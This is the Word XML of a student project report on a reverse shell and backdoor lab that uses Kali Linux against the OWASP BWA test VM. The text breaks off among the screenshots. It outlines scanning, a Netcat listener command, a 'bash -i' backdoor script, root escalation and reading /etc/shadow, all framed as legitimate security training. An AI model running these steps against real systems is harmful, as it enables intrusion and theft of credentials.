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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Department of Computer Science</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Progress Report – Academic Year 114</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Title: From Penetration to Defense: Practical Exercises on Reverse Shell Attacks and Backdoor Implantation Based on Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Advisor:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Professor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team Leader:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gao En-Zai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: June 26, 2025</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ao183eaobd98" w:id="0"/>
      <w:bookmarkEnd w:id="0"/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Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Research Background and Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Content</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Research Methods</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flowchart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Planned Tasks and Expected Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Work Allocation and Project Schedule (Gantt Chart)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Problems Encountered and Solutions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipment Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Experimental Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="141823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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038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This project aims to simulate the process of a hacker attack using Kali Linux toolsets on OWASP Broken Web Applications (BWA), performing penetration tests to successfully gain remote system root privileges and obtain sensitive files (such as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/etc/shadow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). The test process covers port scanning, service analysis, vulnerability exploitation, reverse shell establishment, information gathering, and web service analysis, fully reproducing the attack path used in real-world scenarios. The project not only presents a systematic attack workflow but also emphasizes the importance of defensive perspectives and security awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Research Background and Objectives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As web applications grow more complex, security vulnerabilities become increasingly prevalent. OWASP BWA provides a legal and safe testbed environment for learning and experimenting with common web vulnerabilities and attack methods. This study uses Kali Linux as the primary offensive platform with the following objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="24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Become familiar with penetration testing tools and workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C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Execute reverse shell establishment and obtain root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D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Verify sensitive system information leaks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/etc/passwd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/etc/shadow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).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E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Build a complete attack chain from scanning to exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F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Gain practical red-team experience in a legal environment.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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Project Content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This study covers the following aspects:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042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Set up Kali Linux and OWASP BWA virtual environments (via VirtualBox).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043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Confirm IP addresses: attacker (Kali)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192.168.56.111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, target (OWASP)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192.168.56.105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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044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Use Netcat to establish a listener and implement reverse shell callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045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After privilege escalation to root, read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/etc/shadow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/etc/passwd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, and web root directories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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Execute backdoor scripts, inspect open ports, and check the ARP table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="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Perform information gathering and web resource analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Research Methods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The penetration testing process adopted in this study includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment Setup: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 VirtualBox with Kali Linux and OWASP BWA hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port and Service Scanning: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nmap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netstat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arp -a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 to probe services and connections.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell Injection: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 On Kali,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nc -lvnp 4444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 to wait for callbacks. On the target, execute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.sh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 backdoor script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bash -i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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation &amp; Data Access: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 Gain root privileges, retrieve sensitive files and logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Analysis: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 Explore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/var/www/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 directory for projects such as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bwapp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webgoat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evil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 to evaluate vulnerabilities.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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Flowchart</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052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Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053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 ├─ ARP &amp; Nmap scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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 └─ Start nc listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055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OWASP BWA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057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 ├─ Download and execute backdoor.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058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 ├─ Successfully establish reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059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 ├─ Retrieve system information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A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 │    ├─ whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B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 │    ├─ id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C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 │    └─ uname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D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 ├─ Read sensitive files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E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 │    ├─ /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F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 │    └─ /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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 └─ Analyze /var/www directory and services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Planned Tasks and Expected Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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020"/>
        <w:gridCol w:w="5655"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4020"/>
            <w:gridCol w:w="565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jc w:val="center"/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Task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jc w:val="center"/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Expected Outcome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VM environment setup and network configuration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Fully connected Kali &amp; OWASP test environment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Reverse shell testing &amp; backdoor script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Successfully connect and control target, establish remote shell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System &amp; web resource analysis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Collect sensitive system info, access web directories, analyze vulnerabilities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Complete documentation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Screenshots, flowcharts, and command logs supporting final presentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Experimental Screenshots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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preliminary Setup (Illustration)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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1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b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2834640"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212578576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From the attacker machine (Kali), transfer the payload (e.g., a malicious ELF file) to the target machine (OWASP) to test whether the file transfer is successful and whether internal network penetration is possible.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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Experimental Screenshot (Using Reverse Shell)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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212578576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0400" cy="210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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212578577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0400" cy="210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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
